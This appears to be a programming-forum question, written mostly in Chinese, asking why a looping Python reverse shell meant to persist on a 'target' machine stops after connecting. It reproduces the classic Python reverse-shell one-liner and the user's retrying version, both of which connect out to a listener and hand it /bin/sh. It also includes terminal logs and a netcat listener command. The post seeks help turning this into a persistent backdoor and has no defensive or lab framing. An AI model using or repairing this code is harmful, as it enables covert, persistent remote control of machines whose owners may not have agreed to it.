我正在尝试将下面的经典 python 反向 shell 转换为可以在机器上运行并随时连接回的持久 shell。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
我让它几乎按预期工作,但是当 shell 捕获时,python 进程停止。我认为这是由于 python 子进程模块的行为,但我不确定。
我尝试过交换subprocess.Popenand subprocess.call,并尝试过使用continueandpass关键字。我的代码如下。
import subprocess,socket,time,os
while True:
try: # classic python reverse shell
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP-ADDR",PORT))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.Popen(["/bin/sh","-i"])
print('[+] Shell Spawned')
except: # if the shell doesn't catch
print('[-] Error Spawning Shell')
time.sleep(5) # wait 5 seconds and try again
这是在“目标”机器上运行脚本的输出。
michael@linux:~/Desktop$ python3 reverse_shell.py
[-] Error Spawning Shell
[-] Error Spawning Shell
[-] Error Spawning Shell
/// I STARTED LISTENING HERE ///
[1]+ Stopped python3 reverse_shell.py
michael@linux:~/Desktop$ exit
There are stopped jobs.
/// AS SOON AS I STARTED TYPING THE 'J' IN JOBS THIS 'EXIT' LINE APPEARED ABOVE ///
michael@linux:~/Desktop$ jobs
[1]+ Stopped python3 reverse_shell.py
/// THE PROCESS IS STOPPED ///
michael@linux:~/Desktop$
这是监听机上的输出...
root@ubuntu:~# nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 67.163.203.87 34946 received!
[+] Shell Spawned
/// NOT SURE WHY THIS IS PRINTED HERE AND NOT ON TARGET MACHINE ///
$ exit
/// THIS EXIT IS PRINTED ON THE TARGET MACHINE FOR SOME REASON ///
root@ubuntu:~#
我本来希望目标机器上的所有输出,并且脚本继续运行,shell 在后台生成,并且仅在另一台机器正在侦听时才捕获。我希望这个脚本在后台运行时能够完美运行。为什么这不起作用?